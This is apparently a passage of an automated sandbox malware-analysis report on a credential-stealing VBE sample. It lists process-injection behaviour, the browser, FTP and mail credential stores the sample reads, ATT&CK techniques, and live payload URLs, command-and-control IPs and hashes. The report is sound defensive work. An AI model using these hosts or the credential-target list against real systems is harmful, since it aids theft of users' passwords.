                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: dump.pcap, type: PCAP
                  Source: Yara matchFile source: 8.2.RegSvcs.exe.1150000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000008.00000002.3296808679.00000000030C4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.3296808679.0000000003091000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.3296808679.00000000030BC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.3294593134.0000000001152000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3276, type: MEMORYSTR
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                  Source: Yara matchFile source: 8.2.RegSvcs.exe.1150000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000008.00000002.3296808679.0000000003091000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.3294593134.0000000001152000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3276, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Source: Yara matchFile source: dump.pcap, type: PCAP
                  Source: Yara matchFile source: 8.2.RegSvcs.exe.1150000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000008.00000002.3296808679.00000000030C4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.3296808679.0000000003091000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.3296808679.00000000030BC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.3294593134.0000000001152000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3276, type: MEMORYSTR
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information211
                  Scripting
                  Valid Accounts121
                  Windows Management Instrumentation
                  211
                  Scripting
                  1
                  DLL Side-Loading
                  1
                  Disable or Modify Tools
                  2
                  OS Credential Dumping
                  2
                  File and Directory Discovery
                  Remote Services1
                  Archive Collected Data
                  1
                  Ingress Tool Transfer
                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts1
                  Exploitation for Client Execution
                  1
                  DLL Side-Loading
                  311
                  Process Injection
                  1
                  Obfuscated Files or Information
                  1
                  Credentials in Registry
                  24
                  System Information Discovery
                  Remote Desktop Protocol2
                  Data from Local System
                  11
                  Encrypted Channel
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts1
                  PowerShell
                  Logon Script (Windows)Logon Script (Windows)1
                  DLL Side-Loading
                  Security Account Manager111
                  Security Software Discovery
                  SMB/Windows Admin Shares1
                  Email Collection
                  1
                  Non-Standard Port
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                  Masquerading
                  NTDS1
                  Process Discovery
                  Distributed Component Object ModelInput Capture2
                  Non-Application Layer Protocol
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script131
                  Virtualization/Sandbox Evasion
                  LSA Secrets131
                  Virtualization/Sandbox Evasion
                  SSHKeylogging23
                  Application Layer Protocol
                  Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts311
                  Process Injection
                  Cached Domain Credentials1
                  Application Window Discovery
                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync1
                  System Network Configuration Discovery
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1554388 Sample: Booking_0731520.vbe Startdate: 12/11/2024 Architecture: WINDOWS Score: 100 27 documenthost.store 2->27 29 api.ipify.org 2->29 41 Suricata IDS alerts for network traffic 2->41 43 Found malware configuration 2->43 45 Malicious sample detected (through community Yara rule) 2->45 47 4 other signatures 2->47 8 wscript.exe 2->8         started        11 wscript.exe 27 2->11         started        14 wscript.exe 2->14         started        signatures3 process4 dnsIp5 57 Wscript starts Powershell (via cmd or directly) 8->57 59 Windows Scripting host queries suspicious COM object (likely to drop second stage) 8->59 16 powershell.exe 44 8->16         started        35 documenthost.store 172.67.215.48, 443, 49704, 49705 CLOUDFLARENETUS United States 11->35 61 System process connects to network (likely due to code injection or exploit) 11->61 63 Potential evasive VBS script found (sleep loop) 11->63 65 Suspicious execution chain found 11->65 signatures6 process7 signatures8 37 Writes to foreign memory regions 16->37 39 Injects a PE file into a foreign processes 16->39 19 RegSvcs.exe 15 2 16->19         started        23 wermgr.exe 19 16->23         started        25 conhost.exe 16->25         started        process9 dnsIp10 31 162.254.34.31, 49983, 587 VIVIDHOSTINGUS United States 19->31 33 api.ipify.org 104.26.12.205, 443, 49981 CLOUDFLARENETUS United States 19->33 49 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 19->49 51 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 19->51 53 Tries to steal Mail credentials (via file / registry access) 19->53 55 2 other signatures 19->55 signatures11

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  Booking_0731520.vbe25%ReversingLabsWin32.Trojan.Leonem
                  No Antivirus matches
                  No Antivirus matches
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  https://documenthost.store/2910/filen0%Avira URL Cloudsafe
                  https://documenthost.store/2910/r0%Avira URL Cloudsafe
                  https://documenthost.store/2910/v0%Avira URL Cloudsafe
                  https://documenthost.store:443/2910/E93ukvxugzIRTSVJZUqI.txt0%Avira URL Cloudsafe
                  https://documenthost.store/2910/file0%Avira URL Cloudsafe
                  https://documenthost.store:443/2910/r0%Avira URL Cloudsafe
                  https://documenthost.store/L0%Avira URL Cloudsafe
                  https://documenthost.store/2910/s0%Avira URL Cloudsafe
                  https://documenthost.store/2910/E93ukvxugzIRTSVJZUqI.txt0%Avira URL Cloudsafe
                  https://documenthost.store:443/2910/file0%Avira URL Cloudsafe
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  documenthost.store
                  172.67.215.48
                  truetrue
                    unknown
                    api.ipify.org
                    104.26.12.205
                    truefalse
                      high
                      NameMaliciousAntivirus DetectionReputation
                      https://api.ipify.org/false
                        high
                        https://documenthost.store/2910/strue
                        • Avira URL Cloud: safe
                        unknown
                        https://documenthost.store/2910/vtrue
                        • Avira URL Cloud: safe
                        unknown
                        https://documenthost.store/2910/rtrue
                        • Avira URL Cloud: safe
                        unknown
                        https://documenthost.store/2910/filetrue
                        • Avira URL Cloud: safe
                        unknown
                        https://documenthost.store/2910/E93ukvxugzIRTSVJZUqI.txttrue
                        • Avira URL Cloud: safe
                        unknown
                        NameSourceMaliciousAntivirus DetectionReputation
                        https://documenthost.store/2910/filenwscript.exe, 00000000.00000003.2247215022.000001FE4C763000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2249046009.000001FE4C763000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2247957240.000001FE4C763000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://api.ipify.orgRegSvcs.exe, 00000008.00000002.3296808679.0000000003041000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.3294593134.0000000001152000.00000040.00000400.00020000.00000000.sdmpfalse
                          high
                          https://documenthost.store:443/2910/E93ukvxugzIRTSVJZUqI.txtwscript.exe, 00000000.00000003.2108162722.000001FE4C759000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2108624502.000001FE4C759000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2209476075.000001FE4C759000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://account.dyn.com/RegSvcs.exe, 00000008.00000002.3294593134.0000000001152000.00000040.00000400.00020000.00000000.sdmpfalse
                            high
                            https://documenthost.store/Lwscript.exe, 00000000.00000003.2221847721.000001FE4C723000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2072222190.000001FE4C723000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2058132166.000001FE4C723000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2209476075.000001FE4C723000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://documenthost.store:443/2910/rwscript.exe, 00000000.00000003.2072048956.000001FE4C759000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://api.ipify.org/tRegSvcs.exe, 00000008.00000002.3296808679.0000000003041000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://documenthost.store:443/2910/filewscript.exe, 00000000.00000003.2247957240.000001FE4C759000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2249046009.000001FE4C759000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2246918851.000001FE4C759000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegSvcs.exe, 00000008.00000002.3296808679.0000000003041000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs
                                IPDomainCountryFlagASNASN NameMalicious
                                104.26.12.205
                                api.ipify.orgUnited States
                                13335CLOUDFLARENETUSfalse
                                162.254.34.31
                                unknownUnited States
                                64200VIVIDHOSTINGUStrue
                                172.67.215.48
                                documenthost.storeUnited States
                                13335CLOUDFLARENETUStrue
                                Joe Sandbox version:41.0.0 Charoite
                                Analysis ID:1554388
                                Start date and time:2024-11-12 13:38:56 +01:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 5m 32s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:12
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:Booking_0731520.vbe
                                Detection:MAL
                                Classification:mal100.troj.spyw.expl.evad.winVBE@10/12@2/3
                                EGA Information:
                                • Successful, ratio: 100%
                                HCA Information:
                                • Successful, ratio: 100%
                                • Number of executed functions: 57
                                • Number of non-executed functions: 11
                                Cookbook Comments:
                                • Found application associated with file extension: .vbe
                                • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                • Excluded IPs from analysis (whitelisted): 52.182.143.212
                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, onedsblobprdcus15.centralus.cloudapp.azure.com, slscr.update.microsoft.com, otelrules.azureedge.net, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                • Not all processes where analyzed, report is missing behavior information
                                • Report size getting too big, too many NtCreateKey calls found.
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                • VT rate limit hit for: Booking_0731520.vbe
                                TimeTypeDescription
                                07:39:47API Interceptor10x Sleep call for process: wscript.exe modified
                                07:41:05API Interceptor41x Sleep call for process: powershell.exe modified
                                07:41:10API Interceptor18x Sleep call for process: RegSvcs.exe modified
                                07:41:27API Interceptor1x Sleep call for process: wermgr.exe modified
                                13:40:04Task SchedulerRun new task: PPJeBFdmEDGXlnL path: C:\Users\user\AppData\Roaming\PPJeBFdmEDGXlnL.vbs
                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                104.26.12.205Ransomware Mallox.exeGet hashmaliciousTargeted RansomwareBrowse
                                • api.ipify.org/
                                Yc9hcFC1ux.exeGet hashmaliciousUnknownBrowse
                                • api.ipify.org/
                                6706e721f2c06.exeGet hashmaliciousRemcosBrowse
                                • api.ipify.org/
                                perfcc.elfGet hashmaliciousXmrigBrowse
                                • api.ipify.org/
                                SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeGet hashmaliciousRDPWrap ToolBrowse
                                • api.ipify.org/
                                SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeGet hashmaliciousRDPWrap ToolBrowse
                                • api.ipify.org/
                                hloRQZmlfg.exeGet hashmaliciousRDPWrap ToolBrowse
                                • api.ipify.org/
                                file.exeGet hashmaliciousRDPWrap ToolBrowse
                                • api.ipify.org/
                                file.exeGet hashmaliciousUnknownBrowse
                                • api.ipify.org/
                                file.exeGet hashmaliciousUnknownBrowse
                                • api.ipify.org/
                                162.254.34.31SWIFTCOPY202973783.vbeGet hashmaliciousAgentTeslaBrowse
                                  D6yz87XjgM.exeGet hashmaliciousAgentTeslaBrowse
                                    Urgent Quotation documents One Pdf.vbsGet hashmaliciousAgentTeslaBrowse
                                      Ref#150689.vbeGet hashmaliciousAgentTeslaBrowse
                                        Request for Best Price Offer.exeGet hashmaliciousAgentTeslaBrowse
                                          EQORY0083009.vbsGet hashmaliciousAgentTeslaBrowse
                                            Order0958490.vbeGet hashmaliciousAgentTeslaBrowse
                                              Ref#0503711.exeGet hashmaliciousAgentTeslaBrowse
                                                Booking_0106.exeGet hashmaliciousAgentTeslaBrowse
                                                  Ref_5010_103.exeGet hashmaliciousAgentTeslaBrowse
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    api.ipify.orgPurchase order.exeGet hashmaliciousAgentTeslaBrowse
                                                    • 104.26.12.205
                                                    https://www.canva.com/design/DAGV5ZsI2aM/Y4DbzinsvfGp5Ll4c_oJJQ/view?utm_content=DAGV5ZsI2aM&utm_campaign=designshare&utm_medium=link&utm_source=editorGet hashmaliciousUnknownBrowse
                                                    • 104.26.13.205
                                                    Ziraat_Bankasi_Swift_Mesaji_DXB04958T.batGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                    • 104.26.12.205
                                                    Swift Copy.bat.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                    • 104.26.13.205
                                                    Pago por adelantado_ USD 72000 (50%).exeGet hashmaliciousAgentTeslaBrowse
                                                    • 104.26.13.205
                                                    SWIFTCOPY202973783.vbeGet hashmaliciousAgentTeslaBrowse
                                                    • 104.26.13.205
                                                    Quotation.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                    • 172.67.74.152
                                                    Creal.exeGet hashmaliciousCreal StealerBrowse
                                                    • 104.26.13.205
                                                    #U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeGet hashmaliciousBlank Grabber, Creal StealerBrowse
                                                    • 104.26.12.205
                                                    ypauPrrA08.exeGet hashmaliciousAdes Stealer, BlackGuard, VEGA StealerBrowse
                                                    • 104.26.13.205
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    CLOUDFLARENETUShttp://spain.recordsbluemountain.comGet hashmaliciousUnknownBrowse
                                                    • 188.114.96.3
                                                    Fizetes_12112024.jpg.imgGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                    • 188.114.97.3
                                                    #U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253,jpg.imgGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                    • 188.114.97.3
                                                    DEMASI-24-12B DOC. SCAN.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                    • 172.67.216.75
                                                    https://microsoftatacrisuredbathehatcheragency.birchsstreet.net/Get hashmaliciousUnknownBrowse
                                                    • 104.21.29.37
                                                    Scan_7341292.pdfGet hashmaliciousHTMLPhisherBrowse
                                                    • 104.18.95.41
                                                    https://t.ly/D5x5UGet hashmaliciousBraodoBrowse
                                                    • 162.159.61.3
                                                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                    • 172.64.41.3
                                                    Offer Document.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                    • 188.114.96.3
                                                    https://amende-facture.business/ANTGet hashmaliciousUnknownBrowse
                                                    • 104.21.17.52
                                                    VIVIDHOSTINGUSSWIFTCOPY202973783.vbeGet hashmaliciousAgentTeslaBrowse
                                                    • 162.254.34.31
                                                    D6yz87XjgM.exeGet hashmaliciousAgentTeslaBrowse
                                                    • 162.254.34.31
                                                    m68k.elfGet hashmaliciousUnknownBrowse
                                                    • 64.190.116.37
                                                    Urgent Quotation documents One Pdf.vbsGet hashmaliciousAgentTeslaBrowse
                                                    • 162.254.34.31
                                                    Ref#150689.vbeGet hashmaliciousAgentTeslaBrowse
                                                    • 162.254.34.31
                                                    arm5.elfGet hashmaliciousUnknownBrowse
                                                    • 68.64.140.119
                                                    spc.elfGet hashmaliciousMiraiBrowse
                                                    • 216.157.141.60
                                                    arm.elfGet hashmaliciousMiraiBrowse
                                                    • 206.40.174.18
                                                    Request for Best Price Offer.exeGet hashmaliciousAgentTeslaBrowse
                                                    • 162.254.34.31
                                                    EQORY0083009.vbsGet hashmaliciousAgentTeslaBrowse
                                                    • 162.254.34.31
                                                    CLOUDFLARENETUShttp://spain.recordsbluemountain.comGet hashmaliciousUnknownBrowse
                                                    • 188.114.96.3
                                                    Fizetes_12112024.jpg.imgGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                    • 188.114.97.3
                                                    #U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253,jpg.imgGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                    • 188.114.97.3
                                                    DEMASI-24-12B DOC. SCAN.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                    • 172.67.216.75
                                                    https://microsoftatacrisuredbathehatcheragency.birchsstreet.net/Get hashmaliciousUnknownBrowse
                                                    • 104.21.29.37
                                                    Scan_7341292.pdfGet hashmaliciousHTMLPhisherBrowse
                                                    • 104.18.95.41
                                                    https://t.ly/D5x5UGet hashmaliciousBraodoBrowse
                                                    • 162.159.61.3
                                                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                    • 172.64.41.3
                                                    Offer Document.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                    • 188.114.96.3
                                                    https://amende-facture.business/ANTGet hashmaliciousUnknownBrowse
                                                    • 104.21.17.52
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    3b5074b1b5d032e5620f69f9f700ff0eFizetes_12112024.jpg.imgGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                    • 104.26.12.205
                                                    #U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253,jpg.imgGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                    • 104.26.12.205
                                                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                    • 104.26.12.205
                                                    Offer Document.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                    • 104.26.12.205
                                                    BL New Booking_ 021-34326093HL.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                    • 104.26.12.205
                                                    Malzeme i#U00e7in G#U00f6rsel Sipari#U015fler #PO160924R0 _323282.exeGet hashmaliciousVIP KeyloggerBrowse
                                                    • 104.26.12.205
                                                    6DfHIXhWXp.lnkGet hashmaliciousUnknownBrowse
                                                    • 104.26.12.205
                                                    YIU6wlOgnJ.lnkGet hashmaliciousUnknownBrowse
                                                    • 104.26.12.205
                                                    VQSLdElLF9.lnkGet hashmaliciousUnknownBrowse
                                                    • 104.26.12.205
                                                    whf6kh4bok.lnkGet hashmaliciousUnknownBrowse
                                                    • 104.26.12.205
                                                    a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                    • 172.67.215.48
                                                    Payment advice_USD75,230.18.xlsGet hashmaliciousUnknownBrowse
                                                    • 172.67.215.48
                                                    Scan12112024,pdf.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                    • 172.67.215.48
                                                    file.exeGet hashmaliciousLummaCBrowse
                                                    • 172.67.215.48
                                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                    • 172.67.215.48
                                                    file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                    • 172.67.215.48
                                                    file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                    • 172.67.215.48
                                                    file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                    • 172.67.215.48
                                                    file.exeGet hashmaliciousLummaCBrowse
                                                    • 172.67.215.48
                                                    file.exeGet hashmaliciousLummaCBrowse
                                                    • 172.67.215.48
                                                    No context
                                                    Process:C:\Windows\System32\wermgr.exe
                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):65536
                                                    Entropy (8bit):0.5345138499493663
                                                    Encrypted:false
                                                    SSDEEP:96:bMFtjSrxYidmRH3Uje0eD/JuNnN9KQXIGZAX/d5FMT2SlPkpXmTA+f/VXT5NHBjE:oDSmGmR30wAAzuiF0Z24lO8
                                                    MD5:A29C9DD7E3D752C7359D7BDD75702762
                                                    SHA1:0F609963814CB9398F49AB97152ECF2814F9D37E
                                                    SHA-256:8630AF3235861FE7464F8688FE82EA5B6F244D71BE09B0E182DBF65638A072A0
                                                    SHA-512:5438A10D80CE3555B006DDC008450606BB1104E5DB18DDD6DF72A0F6B9DB8E33DA8C93343BF2D4FCB542948A7913240D368EEF6EC19DD6A79C4589971256D588
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.P.o.w.e.r.S.h.e.l.l.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.5.8.8.9.0.6.6.0.9.3.1.0.1.8.....R.e.p.o.r.t.T.y.p.e.=.1.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.5.8.8.8.8.6.8.5.9.1.6.8.2.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.c.d.8.e.b.a.3.-.c.1.4.4.-.4.7.3.5.-.b.8.2.5.-.4.2.7.1.c.2.3.2.3.d.d.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.o.w.e.r.S.h.e.l.l...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.f.9.c.-.0.0.0.1.-.0.0.1.4.-.5.5.d.d.-.2.1.2.2.0.0.3.5.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.f.4.3.d.9.b.b.3.1.6.e.3.0.a.e.1.a.3.4.9.4.a.c.5.b.0.6.2.4.f.6.b.e.a.1.b.f.0.5.4.!.p.o.w.e.r.s.h.e.l.l...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.3.7././.0.6././.1.0.:.0.7.:.4.5.:.2.5.!.7.d.6.d.a.!.p.o.w.e.r.s.h.e.l.l...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....T.a.r.g.e.
                                                    Process:C:\Windows\System32\wermgr.exe
                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):7414
                                                    Entropy (8bit):3.6798207728558885
                                                    Encrypted:false
